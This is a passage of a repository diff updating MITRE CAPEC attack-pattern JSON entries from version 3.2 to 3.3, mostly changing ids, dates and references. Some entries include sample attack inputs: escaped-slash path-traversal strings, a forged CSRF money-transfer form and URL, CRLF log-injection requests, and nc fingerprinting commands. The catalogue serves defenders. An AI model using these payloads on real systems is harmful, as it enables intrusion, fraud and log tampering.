"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2015-11-09T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Remote Services with Stolen Credentials",
"description": "This pattern of attack involves an adversary that uses stolen credentials to leverage remote services such as RDP, telnet, SSH, and VNC to log into a system. Once access is gained, any number of malicious activities could be performed.",
"external_references": [
@@ -21,19 +21,67 @@
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/522.html",
"external_id": "CWE-522"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/308.html",
"external_id": "CWE-308"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/309.html",
"external_id": "CWE-309"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/294.html",
"external_id": "CWE-294"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/263.html",
"external_id": "CWE-263"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/262.html",
"external_id": "CWE-262"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/521.html",
"external_id": "CWE-521"
},
{
"source_name": "ATTACK",
"description": "Email Collection:Remote Email Collection",
"url": "https://attack.mitre.org/wiki/Technique/T1114/002",
"external_id": "T1114.002"
},
{
"source_name": "ATTACK",
"description": "Remote Services",
"url": "https://attack.mitre.org/wiki/Technique/T1021",
"external_id": "T1021"
},
{
"source_name": "ATTACK",
"description": "External Remote Services",
"url": "https://attack.mitre.org/wiki/Technique/T1133",
"external_id": "T1133"
}
],
"object_marking_refs": [
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
],
"x_capec_abstraction": "Detailed",
"x_capec_abstraction": "Standard",
"x_capec_example_instances": [
"Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). There are other implementations and third-party tools that provide graphical access Remote Services similar to RDS. Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.",
"Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). It may be called with the winrm command or by any number of programs such as PowerShell."
],
"x_capec_status": "Stable",
"x_capec_typical_severity": "Very High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--071baf4e-1d72-497e-8ac4-edb513262aca.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--557ec773-bd41-4672-a7ab-4f83b3c1b24c",
"id": "bundle--494d9f5e-f8f1-4f64-a658-53fa38857dbc",
"spec_version": "2.0",
"objects": [
{
@@ -23,7 +23,7 @@
],
"x_capec_abstraction": "Meta",
"x_capec_status": "Deprecated",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--074a7522-162a-4656-8c50-36ce5ee5adc6.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--89bebfbc-a59f-45f8-8b2b-96880105756c",
"id": "bundle--8c2f388d-5d54-440a-aa3b-6ae6f358cb02",
"spec_version": "2.0",
"objects": [
{
@@ -72,7 +72,7 @@
],
"x_capec_status": "Stable",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f.json
+4 -3
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--64f7264d-86d3-4856-9518-a34457cac57b",
"id": "bundle--aaea70ec-62a3-4dc9-a5d8-a8f1d9c31700",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Using Escaped Slashes in Alternate Encoding",
"description": "This attack targets the use of the backslash in alternate encoding. An attacker can provide a backslash as a leading character and causes a parser to believe that the next character is special. This is called an escape. By using that trick, the attacker tries to exploit alternate ways to encode the same character which leads to filter problems and opens avenues to attack.",
"external_references": [
@@ -111,6 +111,7 @@
"\n <xhtml:p>For example, the byte pair \\0 might result in a single zero byte (a NULL) being sent. Another example is \\t, which is sometimes converted into a tab character. There is often an equivalent encoding between the back slash and the escaped back slash. This means that \\/ results in a single forward slash. A single forward slash also results in a single forward slash. The encoding looks like this:</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">/ yields /\\/ yields /</xhtml:div>\n ",
"\n <xhtml:div style=\"color:#32498D; font-weight:bold;\">Attack Example: Escaped Slashes in Alternate Encodings</xhtml:div>\n <xhtml:p>An attack leveraging this pattern is very simple. If you believe the target may be filtering the slash, attempt to supply \\/ and see what happens. Example command strings to try out include</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">CWD ..\\/..\\/..\\/..\\/winnt</xhtml:div>\n <xhtml:p>which converts in many cases to</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">CWD ../../../../winnt</xhtml:div>\n <xhtml:p>To probe for this kind of problem, a small C program that uses string output routines can be very useful. File system calls make excellent testing fodder. The simple snippet</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">int main(int argc, char* argv[]){<xhtml:div style=\"margin-left:10px;\">puts(\"\\/ \\\\ \\? \\. \\| \");return 0;</xhtml:div>\n }</xhtml:div>\n <xhtml:p>produces the output</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">/ \\ ? . |</xhtml:div>\n <xhtml:p>Clearly, the back slash is ignored, and thus we have hit on a number of alternative encodings to experiment with. Given our previous example, we can extend the attack to include other possibilities:</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">CWD ..\\?\\?\\?\\?\\/..\\/..\\/..\\/winntCWD \\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/winntCWD ..\\|\\|\\|\\|\\/..\\/..\\/..\\/winnt</xhtml:div>\n "
],
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Experiment</h3><ol><li> <p>The attacker can send input data to the host target (e.g., via http request or command line request</p></li><li> <p>The attacker craft malicious input data which includes escaped slashes. The attacker may need multiple attempts before finding a successful combination.</p></li></ol></div>",
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"The application accepts the backlash character as escape character.",
@@ -122,7 +123,7 @@
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb.json
+3 -3
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--a5513950-fdb7-437c-9d8f-160e801eaa3f",
"id": "bundle--6e6fbadf-91b6-4067-a5be-fad2e08a7cfe",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Manipulating Writeable Configuration Files",
"description": "Generally these are manually edited files that are not in the preview of the system administrators, any ability on the attackers' behalf to modify these files, for example in a CVS repository, gives unauthorized access directly to the application, the same as authorized users.",
"external_references": [
@@ -85,7 +85,7 @@
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Very High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d.json
+10 -4
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--063078a1-2ebb-4ef1-b0c0-6fe61e1d2489",
"id": "bundle--1c796a0d-829d-47ab-ab04-8b4a8a7e7a68",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Cross Site Request Forgery",
"description": "An attacker crafts malicious web links and distributes them (via web pages, email, etc.), typically in a targeted manner, hoping to induce users to click on the link and execute the malicious action against some third-party application. If successful, the action embedded in the malicious link will be processed and accepted by the targeted application with the users' privilege level. This type of attack leverages the persistence and implicit trust placed in user session cookies by many web applications today. In such an architecture, once the user authenticates to an application and a session cookie is created on the user's system, all following transactions for that session are authenticated using that cookie including potential actions initiated by an attacker and simply \"riding\" the existing session cookie.",
"external_references": [
@@ -42,6 +42,11 @@
"url": "http://cwe.mitre.org/data/definitions/716.html",
"external_id": "CWE-716"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/1275.html",
"external_id": "CWE-1275"
},
{
"source_name": "reference_from_CAPEC",
"description": "Thomas Schreiber, Session Riding: A Widespread Vulnerability in Today's Web Applications, SecureNet GmbH",
@@ -72,8 +77,9 @@
]
},
"x_capec_example_instances": [
"\n <xhtml:p>While a user is logged into his bank account, an attacker can send an email with some potentially interesting content and require the user to click on a link in the email.</xhtml:p>\n <xhtml:p>The link points to or contains an attacker setup script, probably even within an iFrame, that mimics an actual user form submission to perform a malicious activity, such as transferring funds from the victim's account.</xhtml:p>\n <xhtml:p>The attacker can have the script embedded in, or targeted by, the link perform any arbitrary action as the authenticated user. When this script is executed, the targeted application authenticates and accepts the actions based on the victims existing session cookie.</xhtml:p>See also: Cross-site request forgery (CSRF) vulnerability in util.pl in @Mail WebMail 4.51 allows remote attackers to modify arbitrary settings and perform unauthorized actions as an arbitrary user, as demonstrated using a settings action in the SRC attribute of an IMG element in an HTML e-mail."
"\n <xhtml:p>While a user is logged into their bank account, an attacker can send an email with some potentially interesting content and require the user to click on a link in the email.</xhtml:p>\n <xhtml:p>The link points to or contains an attacker setup script, probably even within an iFrame, that mimics an actual user form submission to perform a malicious activity, such as transferring funds from the victim's account.</xhtml:p>\n <xhtml:p>The attacker can have the script embedded in, or targeted by, the link perform any arbitrary action as the authenticated user. When this script is executed, the targeted application authenticates and accepts the actions based on the victims existing session cookie.</xhtml:p>See also: Cross-site request forgery (CSRF) vulnerability in util.pl in @Mail WebMail 4.51 allows remote attackers to modify arbitrary settings and perform unauthorized actions as an arbitrary user, as demonstrated using a settings action in the SRC attribute of an IMG element in an HTML e-mail."
],
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Explore target website: </b>The attacker first explores the target website to determine pieces of functionality that are of interest to them (e.g. money transfers). The attacker will need a legitimate user account on the target website. It would help to have two accounts.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Use web application debugging tool such as WebScarab, Tamper Data or TamperIE to analyze the information exchanged between the client and the server</td></tr><tr><td>Use network sniffing tool such as Wireshark to analyze the information exchanged between the client and the server</td></tr><tr><td>View HTML source of web pages that contain links or buttons that perform actions of interest.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Create a link that when clicked on, will execute the interesting functionality.: </b>The attacker needs to create a link that will execute some interesting functionality such as transfer money, change a password, etc.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Create a GET request containing all required parameters (e.g. https://www.somebank.com/members/transfer.asp?to=012345678901&amt=10000)</td></tr><tr><td>Create a form that will submit a POST request (e.g. <form method=\"POST\" action=\"https://www.somebank.com/members/transfer.asp\"><input type=\"hidden\" Name=\"to\" value=\"012345678901\"/><input type=\"hidden\" Name=\"amt\" value=\"10000\"/><input type=\"submit\" src=\"clickhere.jpg\"/></form></td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Convince user to click on link: </b>Finally, the attacker needs to convince a user that is logged into the target website to click on a link to execute the CSRF attack.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Execute a phishing attack and send the user an e-mail convincing them to click on a link.</td></tr><tr><td>Execute a stored XSS attack on a website to permanently embed the malicious link into the website.</td></tr><tr><td>Execute a stored XSS attack on a website where an XMLHTTPRequest object will automatically execute the attack as soon as a user visits the page. This removes the step of convincing a user to click on a link.</td></tr><tr><td>Include the malicious link on the attackers' own website where the user may have to click on the link, or where an XMLHTTPRequest object may automatically execute the attack when a user visits the site.</td></tr></tbody></table></ol></div>",
"x_capec_likelihood_of_attack": "High",
"x_capec_resources_required": [
"All the attacker needs is the exact representation of requests to be made to the application and to be able to get the malicious link across to a victim."
@@ -83,7 +89,7 @@
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Very High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--0a765348-6b5a-4797-9724-44b4fc4f9c55.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--4b00e7f5-2f22-4ab0-b02e-80b3b76ead68",
"id": "bundle--a9c546dd-09fc-4bf9-b108-61ead9f65acc",
"spec_version": "2.0",
"objects": [
{
@@ -37,7 +37,7 @@
"The adversary requires physical access to the targeted communications equipment (networking devices, cables, etc.), which may be spread over a wide area."
],
"x_capec_status": "Draft",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--0a899aed-6271-4cc9-8ffc-5c9575776731.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--9931f79f-4a2a-40f9-ab88-040946627ede",
"id": "bundle--b5c127e1-8907-4791-aada-f584194f54ba",
"spec_version": "2.0",
"objects": [
{
@@ -60,7 +60,7 @@
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--0b08a46d-d680-4f3d-91ad-f97e00878780.json
+3 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--0e4d5e30-2629-4eb1-a4bb-ce7f2510e55a",
"id": "bundle--dca3cf90-2537-4c6b-b8ad-4d79dcdfa44e",
"spec_version": "2.0",
"objects": [
{
@@ -90,6 +90,7 @@
"x_capec_example_instances": [
"Most web servers have a public interface, even if the majority of the site is password protected, there is usually at least a login site and brochureware that is publicly available. HTTP requests to the site are also generally logged to a Web log. From an attacker point of view, standard HTTP requests containing a malicious payload can be sent to the public website (with no other access required), when those requests appear in the log (such as http://victimsite/index.html?< malicious script> if they are followed by an administrator this may be sufficient to probe the administrator's host or local network."
],
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Determine Application Web Server Log File Format: </b>The attacker observes the system and looks for indicators of which logging utility is being used by the web server.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Determine logging utility being used by application web server (e.g. log4j), only possible if the application is known by the attacker or if the application returns error messages with logging utility information.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Determine Injectable Content: </b>The attacker launches various logged actions with malicious data to determine what sort of log injection is possible.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Attacker triggers logged actions with maliciously crafted data as inputs, parameters, arguments, etc.</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Manipulate Log Files: </b>The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted request that the web server will receive and write into the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>\n <xhtml:p>Indirectly through injection, use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry.</xhtml:p>\n <xhtml:p>For example: The HTTP request for \"/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] \"GET /forged-path HTTP/1.1\" 200 - \"-\" USER_AGENT\" may add the log line into Apache \"access_log\" (for example). Different applications may require different encodings of the carriage return and line feed characters.</xhtml:p>\n </td></tr><tr><td>\n <xhtml:p>Directly through log file or database manipulation, use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry.</xhtml:p>\n <xhtml:p>For example: The HTTP request for \"/index.html%0A%0DIP_ADDRESS- - DATE_FORMAT] \"GET /forged-path HTTP/1.1\" 200 - \"-\" USER_AGENT\" may add the log line into Apache \"access_log\" (for example). Different applications may require different encodings of the carriage return and line feed characters.</xhtml:p>\n </td></tr><tr><td>Directly through log file or database manipulation, modify existing log entries.</td></tr></tbody></table></ol></div>",
"x_capec_likelihood_of_attack": "Medium",
"x_capec_prerequisites": [
"Target server software must be a HTTP server that performs web logging."
@@ -102,7 +103,7 @@
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--0cf857f6-afa4-4f0c-850f-58a4f11df157.json
+5 -4
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--f923046d-910c-4bd0-bce5-1eecb474d078",
"id": "bundle--17cf7306-d1b1-4c31-bcbf-05b2e1a52759",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--0cf857f6-afa4-4f0c-850f-58a4f11df157",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Web Application Fingerprinting",
"description": "An attacker sends a series of probes to a web application in order to elicit version-dependent and type-dependent behavior that assists in identifying the target. An attacker could learn information such as software versions, error pages, and response headers, variations in implementations of the HTTP protocol, directory structures, and other similar information about the targeted service. This information can then be used by an attacker to formulate a targeted attack plan. While web application fingerprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.",
"external_references": [
@@ -57,8 +57,9 @@
]
},
"x_capec_example_instances": [
"\n <xhtml:p>An attacker sends malformed requests or requests of nonexistent pages to the server. Consider the following HTTP responses.</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">\n <xhtml:div style=\"color:#32498D; font-weight:bold;\">Response from Apache 1.3.23</xhtml:div>$ nc apache.server.com80 GET / HTTP/3.0\n HTTP/1.1 400 Bad RequestDate: Sun, 15 Jun 2003 17:12: 37 GMTServer: Apache/1.3.23Connection: closeTransfer: chunkedContent-Type: text/HTML; charset=iso-8859-1</xhtml:div>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">\n <xhtml:div style=\"color:#32498D; font-weight:bold;\">Response from IIS 5.0</xhtml:div>$ nc iis.server.com 80GET / HTTP/3.0\n HTTP/1.1 200 OKServer: Microsoft-IIS/5.0Content-Location: http://iis.example.com/Default.htmDate: Fri, 01 Jan 1999 20:14: 02 GMTContent-Type: text/HTMLAccept-Ranges: bytes Last-Modified: Fri, 01 Jan 1999 20:14: 02 GMTETag: W/e0d362a4c335be1: ae1Content-Length: 133</xhtml:div>\n <xhtml:p>[R.170.2]</xhtml:p>\n "
"\n <xhtml:p>An attacker sends malformed requests or requests of nonexistent pages to the server. Consider the following HTTP responses.</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">\n <xhtml:div style=\"color:#32498D; font-weight:bold;\">Response from Apache 1.3.23</xhtml:div>$ nc apache.server.com80 GET / HTTP/3.0\n HTTP/1.1 400 Bad RequestDate: Sun, 15 Jun 2003 17:12: 37 GMTServer: Apache/1.3.23Connection: closeTransfer: chunkedContent-Type: text/HTML; charset=iso-8859-1</xhtml:div>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">\n <xhtml:div style=\"color:#32498D; font-weight:bold;\">Response from IIS 5.0</xhtml:div>$ nc iis.server.com 80GET / HTTP/3.0\n HTTP/1.1 200 OKServer: Microsoft-IIS/5.0Content-Location: http://iis.example.com/Default.htmDate: Fri, 01 Jan 1999 20:14: 02 GMTContent-Type: text/HTMLAccept-Ranges: bytes Last-Modified: Fri, 01 Jan 1999 20:14: 02 GMTETag: W/e0d362a4c335be1: ae1Content-Length: 133</xhtml:div>\n <xhtml:p>[REF-37]</xhtml:p>\n "
],
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Request fingerprinting: </b>Use automated tools or send web server specific commands to web server and wait for server's response.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Use automated tools or send web server specific commands to web server and then receive server's response.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Increase the accuracy of server fingerprinting of Web servers: </b>Attacker usually needs to send several different commands to accurately identify the web server. Attacker can also use automated tools to send requests to the server. The responses of the server may be different in terms of protocol behavior.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Observe the ordering of the several HTTP response headers. The ordering of the header of each server may have unique identities.</td></tr><tr><td>Send bad requests or requests of nonexistent pages to the server.</td></tr><tr><td>Attacker takes existing automated tools to recognize the type and the version of the web server in use.</td></tr></tbody></table><li> <p> <b>Identify Web Application Software: </b>After the web server platform software has been identified, the attacker start to identify web application technologies such as ASP, .NET, PHP and Java on the server.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Examine the file name extensions in URL, for example .php indicates PHP script interfaced with Apache server.</td></tr><tr><td>Examine the HTTP Response Headers. This may leak information about software signatures</td></tr><tr><td>Examine Cookies that may contain server's software information.</td></tr><tr><td>Check error pages.</td></tr></tbody></table><li> <p> <b>Identify Backend Database Version: </b>Determining the database engine type can assist attackers' attempt to successfully execute SQL injection. Some database API such as ODBC will show a database type as part of the driver information when reporting an error.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Use tools to send bogus SQL query to the server and check error pages.</td></tr></tbody></table></ol></div>",
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"Any web application can be fingerprinted. However, some configuration choices can limit the useful information an attacker may collect during a fingerprinting attack."
@@ -71,7 +72,7 @@
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--cee4d34c-12b1-4e68-b3ce-c1b84cb4100d",
"id": "bundle--b6e48eea-3ae7-4430-93d7-24a94d522138",
"spec_version": "2.0",
"objects": [
{
@@ -27,7 +27,7 @@
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--0d2d1e18-6e28-4c58-b442-c5450e6c1112.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--1d2193e3-df73-42ae-8385-11452a15f086",
"id": "bundle--fbca2551-1e75-4c58-bec8-1b25227034d2",
"spec_version": "2.0",
"objects": [
{
@@ -40,7 +40,7 @@
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2.json
+3 -3
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--53e251a0-36aa-4fdb-a046-87778cc9cb29",
"id": "bundle--c34e191f-57d2-4cce-893d-30f57771d35e",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2017-08-04T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "XSS Targeting Error Pages",
"description": "An adversary distributes a link (or possibly some other query structure) with a request to a third party web server that is malformed and also contains a block of exploit code in order to have the exploit become live code in the resulting error page. When the third party web server receives the crafted request and notes the error it then creates an error message that echoes the malformed message, including the exploit. Doing this converts the exploit portion of the message into to valid language elements that are executed by the viewing browser. When a victim executes the query provided by the attacker the infected error message error message is returned including the exploit code which then runs in the victim's browser. XSS can result in execution of code as well as data leakage (e.g. session cookies can be sent to the attacker). This type of attack is especially dangerous since the exploit appears to come from the third party web server, who the victim may trust and hence be more vulnerable to deception.",
"external_references": [
@@ -36,7 +36,7 @@
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--0e475610-f909-4927-a93c-04f08b1781b3.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--92165db0-714f-4837-bb68-dde8b98f8afe",
"id": "bundle--c8ecfeff-77e7-4f61-8d88-f277b1b375a7",
"spec_version": "2.0",
"objects": [
{
@@ -23,7 +23,7 @@
],
"x_capec_abstraction": "Standard",
"x_capec_status": "Deprecated",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--9b8ef465-d059-4c43-be6a-ee9ab01c6f26",
"id": "bundle--c7a81ec0-4083-4dcc-a639-e0a076f4fd81",
"spec_version": "2.0",
"objects": [
{
@@ -34,7 +34,7 @@
"Medium": "The attacker must know how to make use of these smudges."
},
"x_capec_status": "Draft",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--1059e91f-43ff-4a00-bc74-4110979f5247.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--2f38aba2-58ba-4f5b-9b01-057709f4401a",
"id": "bundle--b0234237-a211-46ff-b8ae-cb51f6e4e416",
"spec_version": "2.0",
"objects": [
{
@@ -74,7 +74,7 @@
],
"x_capec_status": "Stable",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--1e7d4b4f-be19-45e7-8aa2-b0a2c3975f0d",
"id": "bundle--461a0911-1a75-44a8-a3ed-7f139b82235f",
"spec_version": "2.0",
"objects": [
{
@@ -49,7 +49,7 @@
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--11d7e0d6-5655-4fc7-aee8-e2e0fc6c5088.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--b896226c-4463-4f73-8553-8ac21a55a8c7",
"id": "bundle--230981d4-9689-4189-b6ba-e6f15861a5a6",
"spec_version": "2.0",
"objects": [
{
@@ -40,7 +40,7 @@
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--123b3182-a540-4b15-ac28-0fbf607f9ebf.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--30a247c8-c7c4-4875-bcad-e445c3f60857",
"id": "bundle--f41a989c-004c-4b6b-acdf-a9b29f8b9bca",
"spec_version": "2.0",
"objects": [
{
@@ -23,7 +23,7 @@
],
"x_capec_abstraction": "Meta",
"x_capec_status": "Deprecated",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--12d80b47-8e4c-4646-bcc3-2bd7059a44e1.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--b8d60558-a2e5-4def-8008-5773353c0192",
"id": "bundle--b2eb0d0f-2b3a-4959-91ee-1982f7b1164c",
"spec_version": "2.0",
"objects": [
{
@@ -73,7 +73,7 @@
],
"x_capec_status": "Stable",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--12de9227-495b-49b2-859f-334a20197ba3.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--5d2aea5e-4ac7-425d-b2f7-9a653851bb93",
"id": "bundle--22197eac-5479-4bd3-a044-9341bdb68dff",
"spec_version": "2.0",
"objects": [
{
@@ -41,7 +41,7 @@
],
"x_capec_status": "Stable",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4.json
+21 -3
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--410a17f9-d14d-4c55-a425-bc7b5ec06dc1",
"id": "bundle--14a2800f-1ae8-45b1-af6b-46e6928bf7ba",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
